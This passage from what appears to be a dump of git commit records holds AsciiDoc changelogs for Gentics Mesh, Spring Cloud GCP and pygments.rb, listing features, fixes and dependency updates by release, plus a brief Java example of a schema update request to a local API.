A detailed description of the versioning feature can be found in our https:\/\/getmesh.io\/docs[Documentation].\n\nImportant changes summary:\n\n* Node update requests must now include the version information\n* The query parameter `?version=published` must be used to load published nodes. Otherwise the node will not be found because the default version scope is __draft__.\n* Two additional permissions for nodes have been added: __publish__, __readpublished__\n\nExisting databases will automatically be migrated during the first setup.\n____\n\nicon:plus[] The missing *availableLanguages* and *defaultLanguage* parameters have been added to the *mesh-ui-config.js* file. Previously no language was configured which removed the option to translate contents.\n\nicon:plus[] Image Property Support - The binary field will now automatically contain properties for image *width*, image *height* and the main *dominant color* in the image.\n\nicon:plus[] API Version endpoint - It is now possible to load the mesh version information via a `GET` request to `{apiLatest}\/`.\n\nicon:plus[] Project endpoint - The current project information can now be loaded via a `GET` request to `{apiLatest}\/:projectName`.\n\nicon:check[] When the search indices were recreated with the reindex endpoint, the mapping for the raw fields was not added. This has been fixed now.\n\nicon:check[] The search index mappings of fields of type \"list\" were incorrect and have been fixed now.\n\nicon:check[] Various issues with the schema node migration process have been fixed.\n\n== 0.6.29 (07.03.2017)\n\nicon:plus[] The documentation has been enhanced.\n\nicon:check[] Missing fields could cause error responses. The missing fields will now be set to null instead.\n\n== 0.6.28 (21.10.2016)\n\nicon:check[] Missing fields could cause error responses. The missing fields will now be set to null instead.\n\n== 0.6.27 (07.10.2016)\n\nicon:check[] Various issues with the schema node migration process have been fixed.\n\n== 0.6.26 (05.10.2016)\n\nicon:plus[] The maximum transformation depth limit was raised from 2 to 3.\n\n== 0.6.25 (20.09.2016)\n\nicon:plus[] The Vert.x version was bumped to 3.3.3.\n\n== 0.6.24 (19.09.2016)\n\nicon:plus[] The Gentics Mesh admin UI has been updated. The UI will no longer send basic auth information for subsequent requests invoked after the login action. Instead the basic auth login information will only be sent during login.\n\nicon:check[] A bug within the breadcrumb resolver has been fixed. Previously breadcrumbs did not account for language fallback options and thus returned a 404 path for nodes which used a different language compared to the language of the retrieved node.\n\n== 0.6.23 (14.09.2016)\n\nicon:check[] The missing availableLanguages and defaultLanguage parameters have been added to the mesh-ui-config.js file. Previously no language was configured which removed the option to translate contents.\n\n== 0.6.22 (24.08.2016)\n\nicon:plus[] It is now possible to publish language variants. Previously it was only possible to publish nodes. 
This affected all language variants of the node.\n\n== 0.6.21 (17.08.2016)\n\nicon:plus[] The debug output in case of errors has been enhanced.\n\n== 0.6.20 (03.08.2016)\n\nicon:check[] The changelog processing action for existing installations was fixed.\n\n== 0.6.19 (02.08.2016)\n\nicon:check[] Mesh-Admin-UI was updated to version 0.6.13\n\n== 0.6.18 (24.06.2016)\n\nicon:check[] Previously a search request which queried a lot of nodes could result in a StackOverflow exception. The cause for this exception was fixed.\n\nicon:plus[] The gentics\/mesh and gentics\/mesh-demo images now use the alpine flavour base image and thus the size of the image stack has been reduced.\n\nicon:plus[] The performance of the search endpoints has been improved.\n\n== 0.6.17 (22.06.2016)\n\nicon:check[] The path property within the node response breadcrumb was not set. The property will contain the resolved webroot path for the breadcrumb element. No value will be set if the resolveLinks query parameter was not configured or was set to OFF. CL-459\n\n== 0.6.16 (21.06.2016)\n\nicon:plus[] Gzip compression support was added. JSON responses are now pretty printed by default.\n\n== 0.6.15 (20.06.2016)\n\nicon:plus[] Mesh-Admin-UI was updated to version 0.6.12\n\n== 0.6.13 (17.06.2016)\n\nicon:plus[] Mesh-Admin-UI was updated to version 0.6.10\n\n== 0.6.12 (02.06.2016)\n\nicon:check[] A bug within the schema migration process was fixed. The label field was previously not correctly handled for newly added fields.\n\nicon:check[] A bug within the schema migration process was fixed. The segmentfield value was reset to null when updating a schema.\n\nicon:check[] The \"AllChangeProperties\" field was removed from the JSON response of schema fields.\n\n== 0.6.11 (31.05.2016)\n\nicon:check[] A bug which prevented node reference deletion was fixed. It is now possible to delete node references using a json null value in update requests.\n\nicon:plus[] OrientDB was updated to version 2.1.18\n\n== 0.6.10 (25.05.2016)\n\nicon:check[] It is now possible to grant and revoke permissions on microschemas using the roles\/:uuid\/permissions endpoint.\n\n== 0.6.9 (04.05.2016)\n\nicon:plus[] The mesh-ui was updated.\n\nicon:plus[] It is now possible to also include non-container nodes in a navigation response using the includeAll parameter. By default only container nodes will be included in the response.\n\nicon:check[] A minor issue within the webroot path handling of node references was fixed. CL-425\n\nicon:check[] Fixed label and allow field property handling when updating schema fields. CL-357\n\nicon:check[] Various concurrency issues have been addressed.\n\n== 0.6.8 (26.04.2016)\n\nicon:plus[] The mesh-ui was updated.\n\nicon:plus[] OrientDB was updated to version 2.1.16\n\n== 0.6.7 (25.04.2016)\n\nicon:check[] Update checker: A bug that prevented the update checker from working correctly was fixed.\n\n== 0.6.6 (06.04.2016)\n\nicon:bullhorn[] Public open beta release\n\nicon:check[] A bug within the reindex changelog entry was fixed. The bug prevented the node index from being recreated.\n\nicon:check[] The mesh-ui-config.js default apiUrl parameter was changed to {apiLatest} in order to allow access from hosts other than localhost.\n\n== 0.6.5 (05.04.2016)\n\nicon:check[] The displayField value was missing within the node search document. 
The value was added.\n\nicon:check[] The changelog execution information was added to the demo data dump and thus no further changelog execution will happen during mesh demo startup.\n\nicon:check[] An edge case that could cause multiple stack overflow exceptions was fixed.\n\nicon:plus[] A Cache-Control: no-cache header has been added to mesh responses.\n\nicon:plus[] The mesh-ui was updated.\n\nicon:check[] Various search index related bugs have been fixed.\n\nicon:plus[] The mesh-ui configuration file was renamed to mesh-ui.config.js\n\n== 0.6.4 (24.03.2016)\n\nicon:plus[] The mesh ui was updated.\n\n== 0.6.3 (22.03.2016)\n\nicon:plus[] Database migration\/changelog system.\n A changelog system was added to mesh. The system is used to upgrade mesh data from one mesh version to another.\n\nicon:plus[] The *published* flag can now be referenced within an elasticsearch query.\n\nicon:check[] It was not possible to update the *allow* flag for schema lists (e.g. micronode lists). This has been fixed now.\n\nicon:check[] The schema migration process did not update the node search index correctly.\n In some cases duplicate nodes would be returned (the old node and the migrated one).\n This has been fixed. Only the latest version of nodes will be returned now.\n\nicon:check[] An NPE was fixed which occurred when updating or creating a node list which included elements which could not be found. (CL-358)\n\nicon:check[] A typo within the search model document for users was fixed.\n The property `emailadress` was renamed to `emailaddress`.\n\n== 0.6.2 (15.03.2016)\n\nicon:check[] The microschema and schema permission fields were always empty for newly created elements.\n\n== 0.6.1 (14.03.2016)\n\nicon:plus[] Added the mesh-ui to the gentics\/mesh docker image\n\n== 0.6.0 (14.03.2016)\n\nicon:plus[] Added image API endpoint\n Images can now be resized and cropped using the image endpoint.\n\nicon:plus[] Added schema versioning\n\nicon:plus[] Added schema migration process\n It is now possible to update schemas. Custom migration handlers can be defined in order to modify the node data.\n\n
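To make the update workflow concrete, a hypothetical schema update request; the payload is a guess at a minimal schema, the uuid is a placeholder, and only the idea of posting an updated schema is taken from this entry:\n\n[source,java]\n----\nimport java.net.URI;\nimport java.net.http.HttpClient;\nimport java.net.http.HttpRequest;\nimport java.net.http.HttpResponse;\n\npublic class SchemaUpdateSketch {\n public static void main(String[] args) throws Exception {\n \/\/ Posting an updated schema creates a new schema version; existing nodes\n \/\/ are then moved to it by the schema migration process.\n String schema = \"{\\\"name\\\":\\\"content\\\",\\\"fields\\\":[\"\n + \"{\\\"name\\\":\\\"name\\\",\\\"type\\\":\\\"string\\\",\\\"required\\\":true},\"\n + \"{\\\"name\\\":\\\"teaser\\\",\\\"type\\\":\\\"string\\\"}]}\";\n\n String schemaUuid = \"replace-with-schema-uuid\";\n HttpRequest request = HttpRequest.newBuilder()\n .uri(URI.create(\"http:\/\/localhost:8080\/api\/v1\/schemas\/\" + schemaUuid))\n .header(\"Content-Type\", \"application\/json\")\n .POST(HttpRequest.BodyPublishers.ofString(schema))\n .build();\n\n HttpResponse<String> response = HttpClient.newHttpClient()\n .send(request, HttpResponse.BodyHandlers.ofString());\n System.out.println(response.statusCode() + \" \" + response.body());\n }\n}\n----\n\n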
icon:plus[] Added Micronodes\/Microschemas\n A new field type has been added which allows creation of micronodes.\n\nicon:plus[] Webroot API\n The webroot REST endpoint was added which allows easy retrieval of nodes by their web path.\n\nicon:plus[] JWT Authentication support has been added\n It is now possible to select JWT in order to authenticate the user.\n\nicon:plus[] Navigation Endpoint\n The navigation REST endpoint was added which allows retrieval of navigation tree data which can be used to render navigations.\n\nicon:plus[] Added docker support\n It is now possible to start mesh using the gentics\/mesh or gentics\/mesh-demo docker image.\n\nicon:plus[] Vert.x update\n The Vert.x dependency was updated to version 3.2.1\n\nicon:check[] Fixed a paging issue for nested tags\n\n== 0.5.0 (17.11.2015)\n\nicon:important[] Closed beta release\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7882bd0f38ce58db0b00844b30ddf549c7be6388","subject":"Update changelog for 1.2.2.RELEASE (#2233)","message":"Update changelog for 1.2.2.RELEASE (#2233)\n\n* Update changelog for 1.2.2.RELEASE\r\n\r\n* Add links to issues","repos":"spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"= Spring Cloud GCP Changelog\n\nhttps:\/\/spring.io\/projects\/spring-cloud-gcp[Spring Cloud GCP] is a set of integrations between Spring Framework and Google Cloud Platform. 
It makes it much easier for Spring framework users to run their applications on Google Cloud Platform.\n\nThis document provides a high-level overview of the changes introduced in Spring Cloud GCP by release.\nFor a detailed view of what has changed, refer to the https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/commits\/master[commit history] on GitHub.\n\n== 1.2.2.RELEASE (2020-03-04)\n\n=== General\n\n* Switched to using GCP Libraries BOM for managing GCP library versions (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2109[#2109])\n* Core auto-configuration can now be disabled with `spring.cloud.gcp.core.enabled=false` (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2147[#2147])\n* Reference documentation improvements\n* Two new modules: Firebase Auth and Secret Manager\n\n=== Datastore\n\n* Support lazy loading entities using @LazyReference (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2104[#2104])\n* Made existsById more efficient by retrieving only the key field (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2127[#2127])\n* Projections now work with the Slice return type (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2133[#2133]) and GQL queries (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2139[#2139]) in repositories\n* Improved repository method name validation (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2155[#2155])\n* Fixed delete for void repository method return type (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2169[#2169])\n\n=== Firebase (NEW)\n\n* Introduced Firebase Authentication module (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2111[#2111])\n\n=== Firestore\n\n* Added IN support in name-based queries (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2054[#2054])\n\n=== Pub\/Sub\n\n* ACK_MODE is now configurable using stream binders (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2079[#2079])\n* Added HealthIndicator implementation (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2030[#2030])\n* Fixed: `PubSubReactiveFactory.poll` doesn't handle exceptions thrown by the `PubSubSubscriberOperations` (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2229[#2229])\n** NOTE: previously silently ignored exceptions are now forwarded to the Flux\n\n=== Secret Manager (NEW)\n\n* Bootstrap Property Source which loads secrets from Secret Manager to be accessible as environment properties to your application (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2168[#2168])\n* SecretManagerTemplate implementation (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2195[#2195])\n* New Secret Manager sample app (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2190[#2190])\n\n=== Spanner\n\n* Fixed java.util.Date conversion and added LocalDate and LocalDateTime support (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2067[#2067])\n* Added support for non-Key ID types in Spring Data REST repositories (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2049[#2049])\n* Optimized eager loading for interleaved properties (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2110[#2110]) (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2165[#2165])\n* Enable using PENDING_COMMIT_TIMESTAMP in Spring Data Spanner (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2203[#2203])\n\n=== 
Storage\n\n* Added ability to provide initial file contents on blob creation (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2097[#2097])\n* You can now use a comparator with GcsStreamingMessageSource to process blobs from Cloud Storage in an ordered manner. (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2117[#2117])\n* Fixed GCS emulator BlobInfo update time initialization (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2113[#2113])\n\n=== Trace\n\n* Hid trace scheduler from Spring Sleuth (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2158[#2158])\n\n== 1.2.1.RELEASE (2019-12-20)\n\n=== Spanner\n\n* Fixed java.sql.Timestamp to com.google.cloud.Timestamp conversion (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2064[#2064])\n\n=== Pub\/Sub\n\n* Fixed AUTO_ACK acking behavior in PubSubInboundChannelAdapter (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2075[#2075])\n\n== 1.2.0.RELEASE (2019-11-26)\n\n=== BigQuery\n\n* New module\n* Autoconfiguration for the BigQuery client objects with credentials needed to interface with BigQuery\n* A Spring Integration message handler for loading data into BigQuery tables in your Spring integration pipelines\n\n=== Cloud Foundry\n\n* Created a separate starter for Cloud Foundry: spring-cloud-gcp-starter-cloudfoundry\n\n=== Datastore\n\n* Datastore emulator support and auto-configuration\n* Entity Inheritance Hierarchies support\n* Query by example\n* Support Pagination for @Query annotated methods\n* Support key fields in name-based query methods\n* Events and Auditing support\n* Support for multiple namespaces\n* Spring Boot Actuator Support for Datastore Health Indicator (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1423[#1423])\n\n=== Firestore\n\n* Spring Data Reactive Repositories for Cloud Firestore\n* Cloud Firestore Spring Boot Starter\n\n=== Logging\n\n* Additional metadata support for JSON logging (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1310[#1310])\n* Add service context for Stackdriver Error Reporting\n* Add option to add custom json to log messages\n* A separate module for Logging outside of autoconfiguration (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1455[#1455])\n\n=== Pub\/Sub\n\n* PubsubTemplate publish to topics in other projects (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1678[#1678])\n* PubsubTemplate subscribe in other projects (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1880[#1880])\n* Reactive support for Pub\/Sub subscription (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1461[#1461])\n* Spring Integration - Pollable Message Source (using Pub\/Sub Synchronous Pull) (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1321[#1321])\n* Pubsub stream binder via synchronous pull (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1419[#1419])\n* Add keepalive property to pubsub; set default at 5 minutes (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1807[#1807])\n* Change thread pools to create daemon threads that do not prevent JVM shutdown (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2010[#2010])\n** This is a change in behavior for non-web applications that subscribe to a Cloud Pub\/Sub topic.\nThe subscription threads used to keep the application alive, but will now allow the application to shut down if no other work needs to be done.\n* Added original message to the 
throwable for Pub\/Sub publish failures (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2020[#2020])\n\n=== IAP\n\n* Added support to allow multiple IAP audience claims (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1856[#1856])\n\n=== Spanner\n\n* Expose Spanner failIfPoolExhausted property (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1889[#1889])\n* Lazy fetch support for interleaved collections (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1460[#1460])\n* Bounded staleness option support (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1727[#1727])\n* Spring Data Spanner Repositories `In` clause queries support (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1701[#1701])\n* Spanner array param binding\n* Events and Auditing support\n* Multi-Instance support (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1530[#1530])\n* Fixed conversion for timestamps older than unix epoch (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2043[#2043])\n* Fixed REST Repositories PUT by populating key fields when virtual key property is set (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/2053[#2053])\n\n=== Spring Cloud Bus\n\n* Spring Cloud Config and Bus over Pub\/Sub sample\/docs (https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/issues\/1550[#1550])\n\n=== Vision\n\n* Cloud Vision Document OCR support\n\n== 1.1.0.RELEASE (2019-01-22)\n\n* https:\/\/cloud.google.com\/blog\/products\/application-development\/announcing-spring-cloud-gcp-1-1-deepening-ties-pivotals-spring-framework[1.1 announcement]\n\n== 1.0.0.RELEASE (2018-09-18)\n\n* https:\/\/cloud.google.com\/blog\/products\/gcp\/calling-java-developers-spring-cloud-gcp-1-0-is-now-generally-available[1.0 announcement]\n","old_contents":"= Spring Cloud GCP Changelog\n\nhttps:\/\/spring.io\/projects\/spring-cloud-gcp[Spring Cloud GCP] is a set of integrations between Spring Framework and Google Cloud Platform. 
It makes it much easier for Spring framework users to run their applications on Google Cloud Platform.\n\nThis document provides a high-level overview of the changes introduced in Spring Cloud GCP by release.\nFor a detailed view of what has changed, refer to the https:\/\/github.com\/spring-cloud\/spring-cloud-gcp\/commits\/master[commit history] on GitHub.\n\n== 1.2.0.RELEASE (2019-11-26)\n\n=== BigQuery\n\n* New module\n* Autoconfiguration for the BigQuery client objects with credentials needed to interface with BigQuery\n* A Spring Integration message handler for loading data into BigQuery tables in your Spring integration pipelines\n\n=== Cloud Foundry\n\n* Created a separate starter for Cloud Foundry: spring-cloud-gcp-starter-cloudfoundry\n\n=== Datastore\n\n* Datastore emulator support and auto-configuration\n* Entity Inheritance Hierarchies support\n* Query by example\n* Support Pagination for @Query annotated methods\n* Support key fields in name-based query methods\n* Events and Auditing support\n* Support for multiple namespaces\n* Spring Boot Actuator Support for Datastore Health Indicator (#1423)\n\n=== Firestore\n\n* Spring Data Reactive Repositories for Cloud Firestore\n* Cloud Firestore Spring Boot Starter\n\n=== Logging\n\n* Additional metadata support for JSON logging (#1310)\n* Add service context for Stackdriver Error Reporting\n* Add option to add custom json to log messages\n* A separate module for Logging outside of autoconfiguration (#1455)\n\n=== Pub\/Sub\n\n* PubsubTemplate publish to topics in other projects (#1678)\n* PubsubTemplate subscribe in other projects (#1880)\n* Reactive support for Pub\/Sub subscription (#1461)\n* Spring Integration - Pollable Message Source (using Pub\/Sub Synchronous Pull) (#1321)\n* Pubsub stream binder via synchronous pull (#1419)\n* Add keepalive property to pubsub; set default at 5 minutes (#1807)\n* Change thread pools to create daemon threads that do not prevent JVM shutdown (#2010)\n** This is a change in behavior for non-web applications that subscribe to a Cloud Pub\/Sub topic.\nThe subscription threads used to keep the application alive, but will now allow the application to shut down if no other work needs to be done.\n* Added original message to the throwable for Pub\/Sub publish failures (#2020)\n\n=== IAP\n\n* Added support to allow multiple IAP audience claims (#1856)\n\n=== Spanner\n\n* Expose Spanner failIfPoolExhausted property (#1889)\n* Lazy fetch support for interleaved collections (#1460)\n* Bounded staleness option support (#1727)\n* Spring Data Spanner Repositories `In` clause queries support (#1701)\n* Spanner array param binding\n* Events and Auditing support\n* Multi-Instance support (#1530)\n* Fixed conversion for timestamps older than unix epoch (#2043)\n* Fixed REST Repositories PUT by populating key fields when virtual key property is set (#2053)\n\n=== Spring Cloud Bus\n\n* Spring Cloud Config and Bus over Pub\/Sub sample\/docs (#1550)\n\n=== Vision\n\n* Cloud Vision Document OCR support\n\n== 1.1.0.RELEASE (2019-01-22)\n\n* https:\/\/cloud.google.com\/blog\/products\/application-development\/announcing-spring-cloud-gcp-1-1-deepening-ties-pivotals-spring-framework[1.1 announcement]\n\n== 1.0.0.RELEASE (2018-09-18)\n\n* https:\/\/cloud.google.com\/blog\/products\/gcp\/calling-java-developers-spring-cloud-gcp-1-0-is-now-generally-available[1.0 announcement]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3964c865a36e57707735ec31de252a2a9c809ea2","subject":"update 
changelog","message":"update changelog\n","repos":"tmm1\/pygments.rb,tmm1\/pygments.rb,tmm1\/pygments.rb","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"= {project-name} Changelog\n:project-name: pygments.rb\n:uri-repo: https:\/\/github.com\/pygments\/pygments.rb\n\nThis document provides a high-level view of the changes to the {project-name} by release.\nFor a detailed view of what has changed, refer to the {uri-repo}\/commits\/master[commit history] on GitHub.\n\n== Unreleased\n\n* Add support for custom lexers ({uri-repo}\/pull\/187[#187])\n* Update Pygments to 2.8.1\n\n== 2.1.0 (2021-02-14) - @slonopotamus\n\n* Update Pygments to 2.8.0\n\n== 2.0.0 (2021-01-08) - @slonopotamus\n\n* stop sending\/receiving `ids` between Ruby and Python\n* use `close_others` Ruby mechanism to prevent file descriptor leaking to Python\n\n== 2.0.0.rc3 (2021-01-08) - @slonopotamus\n\n* fix watchdog race condition leading to `ThreadError(<killed thread>)` on JRuby ({uri-repo}\/pull\/215[#215])\n\n== 2.0.0.rc2 (2021-01-07) - @slonopotamus\n\n* Fix release workflow\n\n== 2.0.0.rc1 (2021-01-07) - @slonopotamus\n\n* Modify `mentos.py` to run on Python 3.x instead of Python 2.7\n* Add `:timeout` parameter to allow for configurable timeouts\n* Add several Python 3.x versions to test matrix\n* Drop dependency on MultiJson\n* Fix hanging on JRuby + Windows\n* Update Pygments to 2.7.3\n* Drop GitHub custom lexers\n* Rework timeout handling\n* Improve error message when Python is not found\n* *Breaking change* Pygments.rb no longer sets default timeout for its operations\n* *Breaking change* Now pygments.rb raises `MentosError` instead of returning `nil` on timeout\n\n== 1.2.1 (2017-12-07)\n\n* Automatically update `lexers` cache on build ({uri-repo}\/pull\/186[#186])\n+\nSee {uri-repo}\/pull\/185[#185] for the reason\n\n== 1.2.0 (2017-09-13)\n\n* Exclude symlinks from the gem package to solve Windows issues ({uri-repo}\/pull\/181[#181])\n* Upgrade pygments to 2.0.0 ({uri-repo}\/pull\/180[#180])\n\n== 1.1.2 (2017-04-03)\n\n* Resolves {uri-repo}\/pull\/176[#176] exclude find_error.py symlink from gem ({uri-repo}\/pull\/177[#177])\n\n== 1.1.1 (2016-12-28)\n\n* Suppress Ruby 2.4.0's warnings ({uri-repo}\/pull\/172[#172])\n* Enable `frozen_string_literal` ({uri-repo}\/pull\/173[#173])\n\n== 1.1.0 (2016-12-24)\n\n* Support JRuby ({uri-repo}\/pull\/170[#170])\n* Make pygments.rb thread safe ({uri-repo}\/pull\/171[#171])\n\n== 1.0.0 (2016-12-11)\n\n* Upgrade bundled pygments to 2.2.0-HEAD ({uri-repo}\/pull\/167[#167])\n+\nThis includes *incompatible changes* because of upgrade of pygments.\nSee https:\/\/pygments.org\/ for details.\n* Relax yajl-ruby dependency to \"~> 1.2\" ({uri-repo}\/pull\/164[#164])\n* Python binary can be configured by `PYTMENTS_RB_PYTHON` env ({uri-repo}\/pull\/168[#168])\n* Improved error messages when python binary is missing ({uri-repo}\/pull\/158[#158])\n\n== 0.5.4 (2013-11-03)\n\n* Update lexers file\n\n== 0.5.3 (2013-09-17)\n\n* Fixes for Slash lexer\n* Improve highlighting for Slash lexer\n* Upgrade to latest pygments (1.7, changes summary follows.\nSee pygments changelog for details)\n** Add Clay lexer\n** Add Perl 6 lexer\n** Add Swig lexer\n** Add nesC lexer\n** Add BlitzBasic lexer\n** Add EBNF lexer\n** Add Igor Pro lexer\n** Add Rexx lexer\n** Add Agda lexer\n** Recognize vim modelines\n** Improve Python 3 lexer\n** Improve Opa lexer\n** Improve Julia lexer\n** Improve Lasso lexer\n** Improve Objective C\/C++ lexer\n** Improve Ruby lexer\n** Improve Stan lexer\n** 
Improve JavaScript lexer\n** Improve HTTP lexer\n** Improve Koka lexer\n** Improve Haxe lexer\n** Improve Prolog lexer\n** Improve F# lexer\n\n== 0.5.2 (2013-07-17)\n\n* Add Slash lexer\n\n== 0.5.1 (2013-06-25)\n\n* Ensure compatibility across distros by detecting if `python2` is available\n\n== 0.5.0 (2013-04-13)\n\n* Use `#rstrip` to fix table mode bug\n\n== 0.4.2 (2013-02-25)\n\n* Add new lexers, including custom lexers\n\n== 0.3.7 (2013-01-02)\n\n* Fixed missing custom lexers\n* Added syntax highlighting for Hxml\n\n== 0.3.4 (2012-12-28)\n\n* Add support for Windows\n* Add MIT license\n","old_contents":"= {project-name} Changelog\n:project-name: pygments.rb\n:uri-repo: https:\/\/github.com\/pygments\/pygments.rb\n\nThis document provides a high-level view of the changes to the {project-name} by release.\nFor a detailed view of what has changed, refer to the {uri-repo}\/commits\/master[commit history] on GitHub.\n\n== Unreleased\n\n* Add support for custom lexers ({uri-repo}\/pull\/187[#187])\n\n== 2.1.0 (2021-02-14) - @slonopotamus\n\n* Update Pygments to 2.8.0\n\n== 2.0.0 (2021-01-08) - @slonopotamus\n\n* stop sending\/receiving `ids` between Ruby and Python\n* use `close_others` Ruby mechanism to prevent file descriptor leaking to Python\n\n== 2.0.0.rc3 (2021-01-08) - @slonopotamus\n\n* fix watchdog race condition leading to `ThreadError(<killed thread>)` on JRuby ({uri-repo}\/pull\/215[#215])\n\n== 2.0.0.rc2 (2021-01-07) - @slonopotamus\n\n* Fix release workflow\n\n== 2.0.0.rc1 (2021-01-07) - @slonopotamus\n\n* Modify `mentos.py` to run on Python 3.x instead of Python 2.7\n* Add `:timeout` parameter to allow for configurable timeouts\n* Add several Python 3.x versions to test matrix\n* Drop dependency on MultiJson\n* Fix hanging on JRuby + Windows\n* Update Pygments to 2.7.3\n* Drop GitHub custom lexers\n* Rework timeout handling\n* Improve error message when Python is not found\n* *Breaking change* Pygments.rb no longer sets default timeout for its operations\n* *Breaking change* Now pygments.rb raises `MentosError` instead of returning `nil` on timeout\n\n== 1.2.1 (2017-12-07)\n\n* Automatically update `lexers` cache on build ({uri-repo}\/pull\/186[#186])\n+\nSee {uri-repo}\/pull\/185[#185] for the reason\n\n== 1.2.0 (2017-09-13)\n\n* Exclude symlinks from the gem package to solve Windows issues ({uri-repo}\/pull\/181[#181])\n* Upgrade pygments to 2.0.0 ({uri-repo}\/pull\/180[#180])\n\n== 1.1.2 (2017-04-03)\n\n* Resolves {uri-repo}\/pull\/176[#176] exclude find_error.py symlink from gem ({uri-repo}\/pull\/177[#177])\n\n== 1.1.1 (2016-12-28)\n\n* Suppress Ruby 2.4.0's warnings ({uri-repo}\/pull\/172[#172])\n* Enable `frozen_string_literal` ({uri-repo}\/pull\/173[#173])\n\n== 1.1.0 (2016-12-24)\n\n* Support JRuby ({uri-repo}\/pull\/170[#170])\n* Make pygments.rb thread safe ({uri-repo}\/pull\/171[#171])\n\n== 1.0.0 (2016-12-11)\n\n* Upgrade bundled pygments to 2.2.0-HEAD ({uri-repo}\/pull\/167[#167])\n+\nThis includes *incompatible changes* because of upgrade of pygments.\nSee https:\/\/pygments.org\/ for details.\n* Relax yajl-ruby dependency to \"~> 1.2\" ({uri-repo}\/pull\/164[#164])\n* Python binary can be configured by `PYTMENTS_RB_PYTHON` env ({uri-repo}\/pull\/168[#168])\n* Improved error messages when python binary is missing ({uri-repo}\/pull\/158[#158])\n\n== 0.5.4 (2013-11-03)\n\n* Update lexers file\n\n== 0.5.3 (2013-09-17)\n\n* Fixes for Slash lexer\n* Improve highlighting for Slash lexer\n* Upgrade to latest pygments (1.7, changes summary follows.\nSee pygments 
changelog for details)\n** Add Clay lexer\n** Add Perl 6 lexer\n** Add Swig lexer\n** Add nesC lexer\n** Add BlitzBasic lexer\n** Add EBNF lexer\n** Add Igor Pro lexer\n** Add Rexx lexer\n** Add Agda lexer\n** Recognize vim modelines\n** Improve Python 3 lexer\n** Improve Opa lexer\n** Improve Julia lexer\n** Improve Lasso lexer\n** Improve Objective C\/C++ lexer\n** Improve Ruby lexer\n** Improve Stan lexer\n** Improve JavaScript lexer\n** Improve HTTP lexer\n** Improve Koka lexer\n** Improve Haxe lexer\n** Improve Prolog lexer\n** Improve F# lexer\n\n== 0.5.2 (2013-07-17)\n\n* Add Slash lexer\n\n== 0.5.1 (2013-06-25)\n\n* Ensure compatibility across distros by detecting if `python2` is available\n\n== 0.5.0 (2013-04-13)\n\n* Use `#rstrip` to fix table mode bug\n\n== 0.4.2 (2013-02-25)\n\n* Add new lexers, including custom lexers\n\n== 0.3.7 (2013-01-02)\n\n* Fixed missing custom lexers\n* Added syntax highlighting for Hxml\n\n== 0.3.4 (2012-12-28)\n\n* Add support for Windows\n* Add MIT license\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} 